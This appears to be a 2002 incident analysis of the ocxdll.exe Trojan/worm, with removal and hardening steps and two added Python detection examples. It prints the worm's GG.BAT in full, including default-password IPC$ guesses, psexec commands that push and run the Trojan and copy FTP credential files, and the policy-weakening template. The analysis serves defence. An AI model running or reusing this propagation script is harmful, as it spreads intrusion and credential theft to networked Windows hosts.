Hi Edward Alfert,
I referenced the steps you wrote in my document. They are nice steps
and, most importantly, they were tested and worked for many people. Great
Here is my analysis:
Sorry guys if this is a repeat. I kind of need to make a correction
on the steps to restore security templates, and I just referenced
Edward Alfert's instructions:
More Analysis on ocxdll.exe virus: v. 1.1
Kyle Lai, CISSP, CISA
This is an SMB over TCP attack, using port 445. It looked for weak
administrator IDs and passwords on the local Windows 2000 systems.
One of my clients also got infected with the ocxdll.exe virus. This
occurred back on 8/28/2002 at 3am. After some detailed analysis, I
determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the local administrator
ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) (if they have a backup .sdb file, then
just reapplying the security policy would fix this part), and added
users/groups back to the "Access this computer from the network"
policy. The cause was bad security (admin ID and passwords) and
firewall, and possibly a backdoor.
- Windows 2000, XP (same port, 445, but not tested yet). Security
policy alteration was ONLY for Windows 2000 (and maybe on XP)
- Windows NT – might be infected as the "root problem" to spread the
Trojan, but it will not get this Trojan based on its re-distribution
method. You probably want to look into this system to determine if
there are any backdoors, Trojans, or if this system was compromised in
any way. It will not change security policies.
What did it do?
1. Hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more
3. Open a backdoor on port 60609.
4. It ran the bot (robot) scripts, i.e. malicious automated
instructions, in the following order.
5. Replace security policy settings using the Microsoft security editor
(SecEdit.exe /configure) command to reset the security policy to
default settings, and replace some additional security settings using
the TFTP8675 file. This is done in quiet mode, so it probably only
flashed the command line window very quickly.
6. It scans for 25 IPs and then starts running "GG.BAT". GG.BAT is
the REAL program that started the hacking.
7. It tries to hack into the system using the following user IDs and
you don't have these user IDs and passwords, maybe you are just
infected on 1 system,
and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator IDs and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If the file was already there,
it copied it anyway, and did it quietly (using psexec.exe –c –f -d).
9. Run the OCXDLL.EXE without any delay (psexec.exe –d), which
extracted the 17 files that are in this self-extracting file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to the "c:\windows\system32" directory.
(maybe to get the configuration from the bot?)
11. Start "taskmngr.exe", which was really a Mirc.EXE, an irc
12. The scripts kicked in to HIDE the mIRC window, so you can
ONLY see it in the process list. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager).
13. xvpll.hlp reports the Trojan status back to the hacker: either the
attempt failed or the attempt succeeded.
Disclaimer: The irc bot scripts have not been fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
This may be a random attack. However, there is a file, ncp.exe,
involved, which is the NetCat program. This program allows the
hackers to gain full control of your system.
1. Best-case scenario is that it was a hack, and no sensitive data
2. Worst-case scenario is that they have controlled your system and
implemented something new that is not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
How to remove the Trojan:
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
(created when running mirc.exe)
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts the mIRC client program during the
3. Change the LOCAL Administrator password on ALL systems! This
includes Windows 2000 PROFESSIONAL! Make sure the new passwords are
strong passwords! Use a mix of uppercase, lowercase, numbers, and
non-alphanumeric characters, i.e. _,+,=,), … for your new passwords,
and make sure the passwords are NOT similar to the administrator ID in
any way. For example, "Administrator123" is a very bad password, even
though it has mixed case and alphanumerics.
4. If possible, change the Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers.)
5. Restore the default security policy by restoring the basic
Microsoft default security template. The following instructions for
restoring the basic default security template are from the USENET
posting by Edward Alfert (edw...@alfert.com) under the topic "Solution
to mIRC and Secedit Virus Networking Problems." in
microsoft.public.scripting.virus.discussion. More info on Microsoft
Security configuration and analysis can be found at
Here are the instructions from Edward Alfert.
1) use the backup security database template to restore the system to
original microsoft defaults. (NOTE...if you upgrade from a previous
this default may not be the default you are used to)...
Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
2) copy /winnt/security/database/secedit.sdb to
you need to do this because you can't run step #3 against the original
3) click on start, run, type mmc and click ok
4) click Console menu, then Add/Remove Snap-In
5) click Add, then double click on "Security and Configuration
"Security Templates", then click close, and ok.
6) right click on "security and configuration analysis" and click on
database"... browse to /winnt/security/database/secedit-check.sdb and
7) right click on "security and configuration analysis" and select
"analyze computer now"
8) browse through the directory structure and you will see that the
computer is currently configured differently.
Make changes as appropriate for your environment.
For example, a very important option that is probably missing (as
the trojan) is that nobody is allowed to logon to the computer via the
6. Go to Start -> Programs -> Administrative Tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups
back into the "Access this computer from the network" policy. The
default setting is:
c. BACKUP OPERATORS
d. POWER USERS
g. IUSR_[ SYSTEM_NAME]
7. You MUST go through the security policies and make sure proper
access was restored. You or some of your applications might have had
specific rights settings prior to the compromise, and the user/group
privileges/rights need to be reset if necessary.
8. You probably have seen a strange SID that was added by the Trojan
in the "Logon Locally" policy. Remove the user SID. The SID there does
NOT mean the Trojan created a user. It was in the security template in
the TFTP8675 file. You can see it at the bottom of this document.
1. Tighten your firewall and lock down the ports and ACLs, BOTH inside
to outside and outside to inside. Make sure port TCP/UDP 445 is
blocked both inbound and outbound on the firewall.
2. If possible, rename your administrator user ID to something else,
and create a user ID called "Administrator" with NO GROUPS associated
with it. This will allow you to monitor anyone trying to use the
3. Set up the security event log. Log successful and failed
Logon/Logoff to audit system access. Make sure to monitor the event
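As an added example (not part of the original posting), here is how the credential-guessing pattern described above can be spotted in a security log export once Logon/Logoff auditing is on. Event IDs 529 (logon failure: bad user name or password) and 540 (successful network logon) are real Windows 2000 IDs; the CSV layout, the thresholds and the log lines are constructed for this example.

```python
# Added example, not from the original posting: flag a burst of network logon
# failures from one source (the GG.BAT "net use" credential attempts) and note
# whether a successful network logon from that source followed within the window.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed detection window
MIN_FAILURES = 3                 # assumed threshold (GG.BAT tries four accounts)
LOGON_FAILURE, NETWORK_LOGON_OK, NETWORK_LOGON_TYPE = 529, 540, 3

# Constructed sample export: timestamp,event_id,account,source_ip,logon_type
SAMPLE_LOG = """\
2002-08-28 03:00:01,529,administrator,10.0.0.7,3
2002-08-28 03:00:01,529,administrator,10.0.0.7,3
2002-08-28 03:00:02,529,root,10.0.0.7,3
2002-08-28 03:00:02,540,admin,10.0.0.7,3
2002-08-28 03:05:00,529,jsmith,10.0.0.12,2
2002-08-28 03:05:30,540,jsmith,10.0.0.12,2
"""


def parse_log(text):
    """Yield (time, event_id, account, source_ip, logon_type) per non-empty CSV line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, acct, src, ltype = line.split(",")
        yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(eid), acct, src, int(ltype)


def detect_guessing(text):
    """Return {source_ip: 'failed' | 'succeeded'} for sources with a failure burst.

    Only network logons (type 3) are considered, which is the path GG.BAT uses;
    'succeeded' means a 540 from the same source fell inside the same window.
    """
    by_src = defaultdict(list)
    for rec in parse_log(text):
        if rec[4] == NETWORK_LOGON_TYPE and rec[1] in (LOGON_FAILURE, NETWORK_LOGON_OK):
            by_src[rec[3]].append(rec)
    verdicts = {}
    for src, recs in by_src.items():
        recs.sort()
        for i, (t0, *_) in enumerate(recs):
            window = [r for r in recs[i:] if r[0] - t0 <= WINDOW]
            if sum(r[1] == LOGON_FAILURE for r in window) >= MIN_FAILURES:
                hit = any(r[1] == NETWORK_LOGON_OK for r in window)
                verdicts[src] = "succeeded" if hit else "failed"
                break
    return verdicts
```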
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,
(this starts the mIRC client program during the Windows startup)
When the mIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant
"configure your system settings with the existing security policy in
secedit.sdb, plus the additional settings in tftp8675". It basically
removed many security restrictions, removed all audits for the system,
and of course removed all users in the "Local Users allowed from the
OCXDLL.EXE is a self-extracting file that included 17 files. It is a
Trojan/worm. dll32nt.hlp has an instruction to do an IP scan
and store the 25 IP addresses it found. Most likely it scanned the
subnet and file servers that were connected to the compromised system
at that time. Then the Trojan has an instruction at the end to run
GG.BAT, which is the instruction to attack the 25 IPs it just found.
Then the process started all over again.
Here are the files that were extracted from ocxdll.exe:
Here is the GG.BAT text:
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
psexec \\%1 -d taskmngr.exe
from SysInternals, here is the description of what the PSEXEC
-c = Copy the specified program to the remote system for execution. If
you omit this option, then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
List from TFTP8675:
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
secreatepagefileprivilege = *S-1-5-32-544
sedebugprivilege = *S-1-5-32-544
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seloaddriverprivilege = *S-1-5-32-544
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
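The TFTP8675 list above is an INF-style security template, so the damage it does can be checked mechanically. The following is an added example (not from the original posting) that parses such a template and flags the weakened password policy, the disabled audit categories, and an "Access this computer from the network" right that lost its default groups; the baseline values are this example's assumptions, not Microsoft defaults, and the sample template is a constructed subset of the list above.

```python
# Added example, not from the original posting: audit an INF-style security
# template (like TFTP8675) for settings that weaken the machine.
MIN_EXPECTED = {               # password policy: value must be at least this (assumed baseline)
    "MinimumPasswordLength": 8,
    "PasswordComplexity": 1,
    "PasswordHistorySize": 5,
    "LockoutBadCount": 5,
}
# Well-known SIDs for built-in Administrators and Users, which an
# "Access this computer from the network" right is assumed to keep.
EXPECTED_NETWORK_LOGON = {"*S-1-5-32-544", "*S-1-5-32-545"}

# Constructed sample: a subset of the TFTP8675 settings quoted above.
SAMPLE_TEMPLATE = """
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountLogon = 0
[Privilege Rights]
sedebugprivilege = *S-1-5-32-544
senetworklogonright = Microsoft
"""


def parse_template(text):
    """Return {lowercased key: value} for 'Key = Value' lines; skip sections and comments."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[":
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip()
    return settings


def audit_template(text):
    """Return sorted findings: weak password policy, disabled auditing, lost logon right."""
    s = parse_template(text)
    findings = []
    for key, minimum in MIN_EXPECTED.items():
        val = s.get(key.lower())
        if val is not None and val.isdigit() and int(val) < minimum:
            findings.append(f"{key}={val} below baseline {minimum}")
    findings += [f"{k} auditing disabled" for k, v in s.items() if k.startswith("audit") and v == "0"]
    if "senetworklogonright" in s:
        present = {p.strip() for p in s["senetworklogonright"].split(",")}
        findings += [f"senetworklogonright missing {sid}" for sid in sorted(EXPECTED_NETWORK_LOGON - present)]
    return sorted(findings)
```

Run against a template exported with secedit, every finding is a setting to compare with the pre-compromise baseline before reapplying it.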